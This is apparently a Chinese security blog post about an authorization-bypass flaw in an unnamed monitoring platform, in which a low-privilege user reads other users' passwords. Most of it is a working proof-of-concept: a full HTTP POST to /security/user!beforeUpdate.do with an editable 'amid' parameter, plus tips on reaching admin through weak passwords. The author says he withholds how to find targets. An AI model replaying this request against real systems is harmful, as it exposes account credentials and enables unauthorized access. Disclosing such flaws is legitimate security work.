一.背景
再三考虑还是分享一下出来,马赛克我打厚一点点,避免大家乱来,平时师傅们遇到渗透测试项目的时候可以试试这个方式
一.过程
具体咋搜不透露了,老规矩知道的师傅都懂,我只教技巧。我们直接废话不多说。
先演示poc 其中构造数据包,其中amid参数为变量,可越权查看他人账号密码以及其它信息
POST /security/user!beforeUpdate.do HTTP/1.1
Host: xxx
Content-Length: 281
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Origin: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxx/security/user!findPage.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: j_identity=1_1; JSESSIONID=869B78BB2E2344B2A185B172BA2DCABA
Connection: close
amid=2100003020000001&username=&pageObject.params.userName=&pageObject.currentPageNum=1&pageObject.pageNum=1&pageObject.totalNum=12&pageObject.pageSizeTemp=20&pageObject.sortName=&pageObject.sortOrder=&pageObject.pageClick=0&randomNum=0&objectName=pageObject&pageObject.pageSize=20
已知一个低权限用户
上poc
现在说下具体测试方法。先用管理员账户登录(弱口令yyds)然后到编辑用户处抓包,得到上面请求连接 然后登录低权限用户尝试越权查看。如上过程
为各位师傅提供讨论的地方,可以后台回复加群 让管理拉您进群 欢迎各位师傅加入。感谢各位师傅对我的关照。技术有限还需要多多仰仗各位师傅的加入!不会可以在群里问下哟 顺便说下,请各位师傅手下留情。不然以后我就不能分享了哦
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考
我不会渗透,我们下次再见!
原文始发于微信公众号(南街老友):某监控平台存在越权查看管理员用户密码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论